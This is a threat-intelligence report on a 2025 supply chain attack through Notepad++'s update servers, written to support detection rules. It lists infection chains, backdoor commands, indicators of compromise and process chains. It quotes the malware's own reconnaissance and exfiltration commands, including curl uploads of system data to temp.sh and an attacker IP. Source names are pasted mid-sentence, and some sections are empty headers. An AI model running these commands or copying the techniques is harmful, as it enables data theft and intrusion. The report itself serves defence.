Notepad++ Supply Chain Attack: Complete Threat Intelligence for Detection Engineering

A state-sponsored supply chain attack compromised Notepad++'s update infrastructure from June to December 2025, Ampcus Cyber enabling Chinese APT group Lotus Blossom Securelist (aka Billbug, Lotus Panda, Raspberry Typhoon) to deliver malicious payloads to targeted victims. The Hacker News The attackers deployed three distinct infection chains Securelist featuring rotating C2 infrastructure, a custom backdoor called Chrysalis, Ampcus CyberRapid7 and multiple evasion techniques including DLL sideloading, ProShow vulnerability exploitation, and Microsoft Warbird abuse. The Hacker NewsRapid7 This report provides comprehensive technical details for building Sigma/Delta detection rules.

Attack timeline and initial access vector

The compromise began in June 2025 when attackers breached Notepad++'s shared hosting provider, Ampcus Cyber gaining the ability to intercept and redirect update traffic. Direct server access ended September 2, 2025, but attackers retained internal service credentials until December 2, 2025. Help Net Security +2 Active malicious payload deployment occurred from late July through late October 2025, Ampcus CyberSecurelist targeting approximately a dozen machines belonging to government entities in the Philippines, financial institutions in El Salvador, IT service providers in Vietnam, and individuals across Southeast Asia and Australia. CyberInsiderHelp Net Security

The attack exploited insufficient update verification controls in the WinGUP updater (gup.exe). When targeted users requested updates, their traffic was selectively redirected to attacker-controlled servers CSO Online serving trojanized NSIS installers. Help Net SecurityInfosecurity Magazine The legitimate notepad++.exe and GUP.exe binaries were not compromised—the attack occurred purely at the infrastructure level. The Hacker NewsSOCRadar

Three distinct infection chains with rotating infrastructure

Chain #1: ProShow exploitation (July–August 2025)

This chain deliberately avoided DLL sideloading, exploiting CVE-2012-10051, a stack-based buffer overflow in Photodex ProShow Producer, to evade EDR detection. The NSIS installer created %appdata%\ProShow\ and dropped legitimate ProShow files alongside a malicious load file containing dual shellcodes—a decoy at the start and the actual Metasploit downloader in the middle. When ProShow.exe launched, the buffer overflow triggered shellcode execution, which decrypted a Metasploit downloader that retrieved a Cobalt Strike beacon from https://45.77.31[.]210/users/admin or https://cdncheck.it[.]com/users/admin.

Chain #2: Lua interpreter abuse (September–October 2025)

A smaller ~140KB NSIS installer created %appdata%\Adobe\Scripts\ and dropped a legitimate Lua interpreter with a malicious alien.ini compiled script. The Lua script allocated executable memory and executed shellcode via the EnumWindowStationsW API callback, loading a Metasploit downloader that fetched Cobalt Strike beacons from https://safe-dns.it[.]com/help/Get-Start.

Chain #3: Chrysalis backdoor via DLL sideloading (October 2025)

The final chain deployed the custom Chrysalis backdoor using DLL sideloading. Ampcus Cyber The NSIS installer created a hidden %appdata%\Bluetooth\ directory and dropped three files: BluetoothService.exe (renamed Bitdefender Submission Wizard), log.dll (malicious DLL), and BluetoothService (encrypted shellcode). The Hacker News When BluetoothService.exe loaded log.dll, it decrypted and executed the Chrysalis backdoor using a Linear Congruential Generator cipher with FNV-1a and MurmurHash-style finalizers. Cyber Press

Chrysalis backdoor: technical specifications for detection

Chrysalis is a feature-rich implant with 15 distinct commands supporting interactive shell access, file operations, and complete self-removal. Cyber Press Key technical characteristics:

Command tags and capabilities:

• 4T: Interactive cmd.exe reverse shell
• 4V: Create process (remote execution via CreateProcessW)
• 4W/4X: Write file/chunk to disk
• 4Y: Read and exfiltrate file data
• 4\: Full self-removal and cleanup
• 4_/4``/4a/4b`: Drive enumeration, file enumeration, file deletion, directory creation
• 4c/4d: Download/upload files from/to C2

Persistence mechanisms: Primary method creates a Windows Service; fallback modifies registry Run keys. Command-line arguments control execution: no arguments triggers installation, -i spawns new instance with -k, and -k executes main C2 logic.

Complete indicators of compromise

Malicious update.exe hashes (SHA1)

Chain #3 component hashes (SHA256)

Auxiliary file hashes (SHA1)

Network infrastructure

Malicious update delivery servers:

45.76.155[.]202 (July-September 2025)
45.32.144[.]255 (October 2025)
95.179.213[.]0 (Late October 2025)

Cobalt Strike C2 servers:

45.77.31[.]210 (Chain #1)
61.4.102[.]97 (Chrysalis C2 - Malaysia)
59.110.7[.]32:8880 (Chain #2)
124.222.137[.]114:9999 (Chain #2)

C2 domains:

cdncheck.it[.]com - CS beacon download/C2
self-dns.it[.]com - System info upload
safe-dns.it[.]com - Metasploit downloader/CS C2
api.skycloudcenter[.]com - Chrysalis C2
api.wiresguard[.]com - CS beacon C2
temp[.]sh - Legitimate service abused for exfil

All malicious URLs

Update delivery URLs:

http://45.76.155[.]202/update/update.exe
http://45.32.144[.]255/update/update.exe
http://95.179.213[.]0/update/update.exe
http://95.179.213[.]0/update/install.exe
http://95.179.213[.]0/update/AutoUpdater.exe

System information upload:

http://45.76.155[.]202/list
https://self-dns.it[.]com/list
https://temp.sh/upload

Cobalt Strike beacon GET requests:

https://45.77.31[.]210/api/update/v1
https://cdncheck.it[.]com/api/update/v1
https://cdncheck.it[.]com/api/getInfo/v1
https://safe-dns.it[.]com/resolve
https://api.wiresguard[.]com/update/v1
https://api.wiresguard[.]com/api/getInfo/v1
http://59.110.7[.]32:8880/api/getBasicInfo/v1
http://124.222.137[.]114:9999/api/updateStatus/v1

Cobalt Strike beacon POST requests:

https://45.77.31[.]210/api/FileUpload/submit
https://cdncheck.it[.]com/api/Metadata/submit
https://cdncheck.it[.]com/api/FileUpload/submit
https://safe-dns.it[.]com/dns-query
https://api.wiresguard[.]com/api/FileUpload/submit
https://api.wiresguard[.]com/api/Info/submit
http://59.110.7[.]32:8880/api/Metadata/submit
http://124.222.137[.]114:9999/api/Info/submit

Chrysalis C2 URL:

https://api.skycloudcenter[.]com/a/chat/s/70521ddf-a2ef-4adf-9cf0-6d8e24aaa821

File system artifacts and paths to monitor

Chain-specific directories

Key files to detect

%appdata%\ProShow\load                    # Exploit payload
%appdata%\ProShow\1.txt                   # System info output
%appdata%\Adobe\Scripts\alien.ini         # Malicious Lua script
%appdata%\Adobe\Scripts\a.txt             # System info output
%appdata%\Bluetooth\BluetoothService.exe  # DLL sideloading target
%appdata%\Bluetooth\BluetoothService      # Encrypted shellcode
%appdata%\Bluetooth\log.dll               # Malicious DLL
C:\ProgramData\USOShared\svchost.exe      # Renamed Tiny-C-Compiler
C:\ProgramData\USOShared\conf.c           # Metasploit shellcode source
u.bat                                      # Self-deletion script

Shell commands executed by malware

Chain #1 reconnaissance:

cmd /c whoami&&tasklist > 1.txt
curl.exe -F "file=@1.txt" -s https://temp.sh/upload
curl.exe --user-agent "https://temp.sh/ZMRKV/1.txt" -s http://45.76.155[.]202

Securelist

Chain #2 reconnaissance (early version):

cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt

Chain #2 reconnaissance (later version):

cmd /c whoami >> a.txt
cmd /c tasklist >> a.txt
cmd /c systeminfo >> a.txt
cmd /c netstat -ano >> a.txt

Metasploit loader execution:

C:\ProgramData\USOShared\svchost.exe -nostdlib -run C:\ProgramData\USOShared\conf.c

Process parent-child relationships for detection

Critical execution chains:
notepad++.exe → gup.exe → update.exe (malicious NSIS installer)
gup.exe → cmd.exe → whoami/tasklist/systeminfo/netstat
update.exe → ProShow.exe → [shellcode execution]
update.exe → script.exe alien.ini (Lua execution)
update.exe → BluetoothService.exe → [log.dll sideload → Chrysalis]
svchost.exe -nostdlib -run conf.c → [Cobalt Strike beacon]
rundll32.exe (no arguments) → [Cobalt Strike indicator]

Detection logic for GUP.exe child processes:

ParentImage ends with "GUP.exe" AND 
Image NOT downloaded from ("notepad-plus-plus.org", "github.com")

MITRE ATT&CK technique mappings

Detection opportunities by log source

Sysmon events

Windows Security Event Log

Web proxy/firewall detection

High-priority indicators:

• HTTP requests with temp[.]sh URLs embedded in User-Agent header
• DNS queries to temp[.]sh from corporate endpoints
• Traffic to C2 domains: cdncheck.it[.]com, safe-dns.it[.]com, api.skycloudcenter[.]com, api.wiresguard[.]com
• Connections to non-standard ports: 8880, 9999
• POST requests to /api/FileUpload/submit, /api/Metadata/submit, /dns-query
• URL patterns mimicking DeepSeek API: /a/chat/s/{GUID}

User-Agent strings observed:

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.4044.92 Safari/537.36